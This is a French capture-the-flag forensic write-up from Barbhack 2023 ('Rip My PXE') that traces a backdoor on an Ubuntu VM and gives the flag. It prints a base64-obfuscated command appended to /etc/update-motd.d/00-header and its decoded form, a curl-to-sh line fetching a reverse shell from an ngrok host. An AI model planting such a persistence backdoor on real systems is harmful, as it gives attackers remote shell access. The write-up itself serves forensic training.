Hackvens
<-- home

Barbhack 2023 / Rip My PXE

August 26, 2023

RIP_My_PXE

Catégorie : Forensic

Enonce

Nous récupérons ici une machine virtuelle que nous importons dans virtualbox.

upload-vm

Après avoir démarré cette machine nous obtenons la mire d’authentification pour l’utilisateur ubuntu :

Ubuntu user

Le mot de passe ubuntu est valide et nous permet de déverrouiller la session.

Nous devons retrouver les traces d’un shell, donc nous cherchons à observer dans un premier temps les processus, l’historique de commande de l’utilisateur, les fichiers disponibles, les historiques de navigation web et les fichiers de log.

  • Historique de commande

command-history

  • Processus

ps-aux

  • Historique de navigation

firefox-history

  • Fichiers de l’utilisateur

documents

  • Fichiers de logs

Nous ne trouvons rien dans les fichiers de logs par défaut et notre attention se porte sur le dossier installer présent dans /var/log/ :

log-subiquity

Nous retrouvons dans le fichier subiquity-server-debug.log.2368 la commande qui a permis d’insérer la backdoor :

backdoor-command

echo 'echo -n Y3VybCBodHRwczovL3JldmVyc2Utc2hlbGwuc2gvMC50Y3AuZXUubmdyb2suaW86MTcyMjQgfCBzaCAgJg== | base64 -d | sh' >> /target/etc/update-motd.d/00-header

L’opération effectué ici est le décodage de la chaîne en base 64 à la fin du fichier /etc/update-motd.d/00-header.

Nous décodons donc la chaîne de base 64 :

curl https://reverse-shell.sh/0.tcp.eu.ngrok.io:17224 | sh  &

Cette commande va donc récupérer un reverse shell et le lancer à chaque fois que l’affichage du motd sera déclenché. Nous obtenons donc la première partie du flag brb{0.tcp.eu.ngrok.io:17224:nom_du_binaire}.

Nous devons trouver le nom du binaire qui à déclenché la backdoor, donc par conséquent, l’affichage du motd. Par défaut le motd est affiché à chaque nouvelle connexion distante sur le système, nous avons aperçu l’utilisation de commandes ssh, telnet et ftp.

Nous tentons le flag : brb{0.tcp.eu.ngrok.io:17224:ssh} qui sera validé par la plateforme du ctf.%